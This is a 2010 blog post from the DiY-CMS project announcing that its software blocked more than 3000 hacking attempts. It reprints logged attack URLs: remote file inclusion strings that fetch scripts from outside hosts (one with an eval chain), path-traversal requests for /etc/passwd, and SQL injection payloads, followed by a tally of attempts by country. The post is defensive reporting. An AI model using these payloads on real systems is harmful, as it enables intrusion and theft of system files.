Do It Yourself CMS » Blog » DiY-CMS Updates


Yeah! Preventing more than 3000 hacking attempts

  By: admin   tags Date Added: Wednesday 03-11-2010 09:27 am | Readers: 8486 | Comments: 0

Security is one of most important criteria in any script one would like to use. In this post I will talk about the security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts, SQL injection through forms, for example, are prevented but not recorded for number of reasons.

Attempts example:
Several methods were used to hack into the DiY-CMS, they include remote file inclusion, sql injection and attempt to access root folders and files.
Here are few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries where attempts originated from:



And here is a full list of countries where attempts originated from with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting you can check “html/bugs.txt” file for the list of all hacking attempts.


Tags: prevent-hacking-